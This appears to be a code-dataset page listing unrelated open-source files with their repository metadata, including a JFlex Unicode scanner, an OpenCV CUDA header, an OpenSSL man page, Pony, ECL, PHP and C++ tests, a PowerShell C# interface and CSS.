* WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY
* WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package de.jflex.ucd_generator.scanner;
import de.jflex.ucd_generator.ucd.UnicodeData;
import de.jflex.ucd.NamedCodepointRange;
%%
%class EnumeratedPropertyFileScanner
%extends AbstractEnumeratedPropertyFileScanner
%ctorarg UnicodeData unicodeData
%ctorarg String defaultPropertyName
%ctorarg String defaultPropertyValue
%unicode
%eofclose
%state BEGIN_RANGE, END_RANGE, PROPERTY_NAME, PROPERTY_VALUE
%state COMMENT_LINE, DEFAULT_PROPERTY_VALUE
%int
%function scan
%init{
super(unicodeData, defaultPropertyName, defaultPropertyValue);
%init}
Hex = [0-9A-Fa-f]{4,6}
Spaces = [ \t]*
NL = \n | \r | \r\n
ItemSeparator = {Spaces} ";" {Spaces}
%%
<YYINITIAL> {
/* # Property: Grapheme_Cluster_Break */
{Spaces} "#" {Spaces} "Property:" {Spaces} { yybegin(PROPERTY_NAME); }
/* # @missing: 0000..10FFFF; Other */
{Spaces} "#" {Spaces} "@missing:" {Spaces} { yybegin(DEFAULT_PROPERTY_VALUE); }
{Spaces} "#" { yybegin(COMMENT_LINE); }
{Spaces} {NL} { }
{Hex} { start = Integer.parseInt(yytext(), 16); yybegin(BEGIN_RANGE); }
}
<COMMENT_LINE> {
.* {NL}? { yybegin(YYINITIAL); }
}
<BEGIN_RANGE> {
".." { yybegin(END_RANGE); }
{ItemSeparator} { end = start; yybegin(PROPERTY_VALUE); }
}
<END_RANGE> {
{Hex} { end = Integer.parseInt(yytext(), 16); }
{ItemSeparator} { yybegin(PROPERTY_VALUE); }
}
<PROPERTY_NAME> { /* # Property: Grapheme_Cluster_Break */
[^ \t\r\n]+ { propertyName = yytext(); }
{Spaces} {NL} { yybegin(YYINITIAL); }
}
<DEFAULT_PROPERTY_VALUE> { /* # @missing: 0000..10FFFF; Other */
/* Assumption: only one default property value is specified,
* so the specified interval can be ignored.
*/
{Hex} ".." {Hex} {ItemSeparator} { }
[^ \t\r\n]+ { defaultPropertyValue = yytext(); }
{Spaces} {NL} { yybegin(YYINITIAL); }
}
<PROPERTY_VALUE> {
[^ \t\r\n#;]+ (" " [^ \t\r\n#;]+)* {
addInterval( start, end, yytext());
}
{Spaces} ("#" .*)? {NL} { yybegin(YYINITIAL); }
}
<YYINITIAL> {
<PROPERTY_NAME> {
<DEFAULT_PROPERTY_VALUE> {
<PROPERTY_VALUE> {
<<EOF>> { addPropertyValueIntervals(); return 0; }
}
}
}
}
| JFlex | 4 | WeDoSoftware/jflex | java/de/jflex/ucd_generator/scanner/EnumeratedPropertyFileScanner.flex | [
"BSD-3-Clause"
] |
// This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.
#ifndef OPENCV_DNN_SRC_CUDA4DNN_CSL_NVCC_DEFS_HPP
#define OPENCV_DNN_SRC_CUDA4DNN_CSL_NVCC_DEFS_HPP
#include <cuda_runtime_api.h>
#ifdef __CUDACC__
# define CUDA4DNN_HOST __host__
# define CUDA4DNN_DEVICE __device__
# define CUDA4DNN_HOST_DEVICE CUDA4DNN_HOST CUDA4DNN_DEVICE
#else
# define CUDA4DNN_HOST
# define CUDA4DNN_DEVICE
# define CUDA4DNN_HOST_DEVICE
#endif
#endif /* OPENCV_DNN_SRC_CUDA4DNN_CSL_NVCC_DEFS_HPP */
| C++ | 2 | thisisgopalmandal/opencv | modules/dnn/src/cuda4dnn/csl/nvcc_defs.hpp | [
"BSD-3-Clause"
] |
=pod
=head1 NAME
PKCS12_get_friendlyname - Retrieve the friendlyname attribute from a PKCS#12 safeBag
=head1 SYNOPSIS
#include <openssl/pkcs12.h>
char *PKCS12_get_friendlyname(PKCS12_SAFEBAG *bag);
=head1 DESCRIPTION
PKCS12_get_friendlyname() retrieves a UTF-8 string representation of the PKCS#9
friendlyName attribute for a PKCS#12 safeBag item.
I<bag> is the B<PKCS12_SAFEBAG> to retrieve the attribute from.
=head1 RETURN VALUES
A UTF-8 string, or NULL if the attribute was either not present or an error occurred.
The returned string is allocated by OpenSSL and should be freed by the user.
=head1 SEE ALSO
L<PKCS12_add_friendlyname_asc(3)>
=head1 COPYRIGHT
Copyright 2019 The OpenSSL Project Authors. All Rights Reserved.
Licensed under the Apache License 2.0 (the "License"). You may not use
this file except in compliance with the License. You can obtain a copy
in the file LICENSE in the source distribution or at
L<https://www.openssl.org/source/license.html>.
=cut
| Pod | 4 | pmesnier/openssl | doc/man3/PKCS12_get_friendlyname.pod | [
"Apache-2.0"
] |
// The types for printf are actually the same in Windows and other OSes, but
// for the purposes of an example that everyone can compile without an external
// library we'll assume they're different.
// Give FFI declaration with a guard for each platform.
use @printf[I32](fmt: Pointer[U8] tag, ...) if windows
use @printf[I32](fmt: Pointer[U8] tag, ...) if not windows
actor Main
new create(env: Env) =>
// This would be an error, since we don't know which declaration to use:
//@printf("Hello\n".cstring())
ifdef windows then
// We only get here in Windows, so we know which FFI declaration to use.
@printf("Hello Windows\n".cstring())
elseif linux then
// Again we know which FFI declaration to use here.
@printf("Hello Linux\n".cstring())
else
// And again we know which FFI declaration to use here.
@printf("Hello everyone else\n".cstring())
end
// Define build flag "foo" on the ponyc command line to change this value:
// -D=foo
let x: U64 =
ifdef "foo" then
3
else
4
end
env.out.print(x.string())
// Define build flag "fail" to hit this compile error:
// -D=fail
ifdef "fail" then
compile_error "We don't support failing"
else
env.out.print("Not failing")
end
| Pony | 5 | presidentbeef/ponyc | examples/ifdef/ifdef.pony | [
"BSD-2-Clause"
] |
/*##############################################################################
HPCC SYSTEMS software Copyright (C) 2015 HPCC Systems®.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
############################################################################## */
numInput := 100000;
r := { unsigned id; unsigned num; };
ds := DATASET(numInput, TRANSFORM(r, SELF.id := COUNTER; SELF.num := (COUNTER % 10) + 10), DISTRIBUTED);
s := SORTED(ds, id);
r2 := RECORD(r)
unsigned cnum;
END;
idRecord := { unsigned id; };
r2 createMatch(r l) := TRANSFORM
d := DATASET(l.num, TRANSFORM(idRecord, SELF.id := HASH64(COUNTER)));
sd := SORT(d, id);
SELF.cnum := COUNT(NOFOLD(sd));
SELF := l;
END;
j := JOIN(s, s(id != 0), LEFT.id = RIGHT.id, createMatch(LEFT), LOCAL, UNORDERED);
f := NOFOLD(j)(num != cnum);
CHOOSEN(f, 1); // There should be 0 output rows.
| ECL | 4 | miguelvazq/HPCC-Platform | testing/regress/ecl/parallelchild.ecl | [
"Apache-2.0"
] |
template <class T>
struct HasTypeWithSelfAsParam {
using TT = HasTypeWithSelfAsParam<HasTypeWithSelfAsParam<T>>;
};
using WillBeInfinite = HasTypeWithSelfAsParam<int>;
namespace RegressionTest {
// This is a regression test to check that we don't instantiate exponentially
// large templates. The below template will instantiate hundreds of thousands
// (or more) of specializations before hitting the 8-template-param-deep limit.
template<class E, int>
struct SliceExpr {
using type = typename E::type;
E expr;
typename E::type* test() { return nullptr; }
};
template<class T>
struct Array {
using type = T;
};
template<class E>
struct ValExpr {
using type = typename E::type;
E expr;
ValExpr<SliceExpr<E, 1>> test1() { return {SliceExpr<E, 1>{expr}}; }
ValExpr<SliceExpr<E, 2>> test2() { return {SliceExpr<E, 2>{expr}}; }
ValExpr<SliceExpr<E, 3>> test3() { return {SliceExpr<E, 3>{expr}}; }
ValExpr<SliceExpr<E, 4>> test4() { return {SliceExpr<E, 4>{expr}}; }
ValExpr<SliceExpr<E, 5>> test5() { return {SliceExpr<E, 5>{expr}}; }
ValExpr<SliceExpr<E, 6>> test6() { return {SliceExpr<E, 6>{expr}}; }
ValExpr<SliceExpr<E, 7>> test7() { return {SliceExpr<E, 7>{expr}}; }
ValExpr<SliceExpr<E, 8>> test8() { return {SliceExpr<E, 8>{expr}}; }
ValExpr<SliceExpr<E, 9>> test9() { return {SliceExpr<E, 8>{expr}}; }
ValExpr<SliceExpr<E, 11>> test11() { return {SliceExpr<E, 11>{expr}}; }
ValExpr<SliceExpr<E, 12>> test12() { return {SliceExpr<E, 12>{expr}}; }
};
// This class template is exponentially slow to *fully* instantiate (and the
// exponent is the number of testX methods). Make sure that we can still
// partially import it without importing all of its child template
// instantiations.
void user(ValExpr<Array<int>> *) { }
} // end namespace 'RegressionTest'
| C | 4 | gandhi56/swift | test/Interop/Cxx/templates/Inputs/large-class-templates.h | [
"Apache-2.0"
] |
--TEST--
Bug #72819 (EXIF thumbnails not read anymore)
--EXTENSIONS--
exif
--INI--
output_handler=
zlib.output_compression=0
--FILE--
<?php
$infile = __DIR__.'/bug72819.jpg';
var_dump(strlen(exif_thumbnail($infile)));
?>
--EXPECT--
int(5448)
| PHP | 2 | NathanFreeman/php-src | ext/exif/tests/bug72819/bug72819.phpt | [
"PHP-3.01"
] |
// Copyright (c) Microsoft Corporation.
// Licensed under the MIT License.
#nullable enable
using System;
using System.Collections.Generic;
namespace System.Management.Automation.Subsystem
{
/// <summary>
/// Define the kinds of subsystems.
/// </summary>
public enum SubsystemKind
{
/// <summary>
/// Component that provides predictive suggestions to commandline input.
/// </summary>
CommandPredictor = 1,
/// <summary>
/// Cross platform desired state configuration component.
/// </summary>
CrossPlatformDsc = 2,
}
/// <summary>
/// Define the base interface to implement a subsystem.
/// The API contracts for specific subsystems are defined within the specific interfaces/abstract classes that implements this interface.
/// </summary>
/// <remarks>
/// There are two purposes to have the internal member `Kind` declared in 'ISubsystem':
/// 1. Make the mapping from an `ISubsystem` implementation to the `SubsystemKind` easy;
/// 2. Make sure a user cannot directly implement 'ISubsystem', but have to derive from one of the concrete subsystem interface or abstract class.
/// <para/>
/// The internal member needs to have a default implementation defined by the specific subsystem interfaces or abstract class,
/// because it should be the same for a specific kind of subsystem.
/// </remarks>
public interface ISubsystem
{
/// <summary>
/// Gets the unique identifier for a subsystem implementation.
/// </summary>
Guid Id { get; }
/// <summary>
/// Gets the name of a subsystem implementation.
/// </summary>
string Name { get; }
/// <summary>
/// Gets the description of a subsystem implementation.
/// </summary>
string Description { get; }
/// <summary>
/// Gets a dictionary that contains the functions to be defined at the global scope of a PowerShell session.
/// Key: function name; Value: function script.
/// </summary>
Dictionary<string, string>? FunctionsToDefine { get; }
/// <summary>
/// Gets the subsystem kind.
/// </summary>
internal SubsystemKind Kind { get; }
}
}
| C# | 5 | dahlia/PowerShell | src/System.Management.Automation/engine/Subsystem/ISubsystem.cs | [
"MIT"
] |
.rmc-pull-to-refresh-content {
transform-origin: left top 0px;
}
.rmc-pull-to-refresh-content-wrapper {
overflow: hidden;
}
.rmc-pull-to-refresh-transition {
transition: transform 0.3s;
}
@keyframes rmc-pull-to-refresh-indicator {
50% {
opacity: 0.2;
}
100% {
opacity: 1;
}
}
.rmc-pull-to-refresh-indicator {
text-align: center;
height: 30px;
line-height: 10px;
}
.rmc-pull-to-refresh-indicator > div {
background-color: grey;
width: 6px;
height: 6px;
border-radius: 100%;
margin: 3px;
animation-fill-mode: both;
display: inline-block;
animation: rmc-pull-to-refresh-indicator 0.5s 0s infinite linear;
}
.rmc-pull-to-refresh-indicator > div:nth-child(0) {
animation-delay: -0.1s !important;
}
.rmc-pull-to-refresh-indicator > div:nth-child(1) {
animation-delay: -0.2s !important;
}
.rmc-pull-to-refresh-indicator > div:nth-child(2) {
animation-delay: -0.3s !important;
}
.rmc-pull-to-refresh-down .rmc-pull-to-refresh-indicator {
margin-top: -25px;
}
| CSS | 4 | qiuziz/taro-react-native | packages/taro-components/src/components/pull-down-refresh/style/index.css | [
"MIT"
] |
@font-face {
font-family: "Test";
src: url("./fonts/test.woff2") format("woff2");
}
.index {
background: url("http://google.com");
}
.quotes {
background: url("data:image/gif;base64,quotes");
}
.no-quote {
background: url(data:image/gif;base64,no-quote);
}
| CSS | 3 | johanberonius/parcel | packages/core/integration-tests/test/integration/css-url/index.css | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.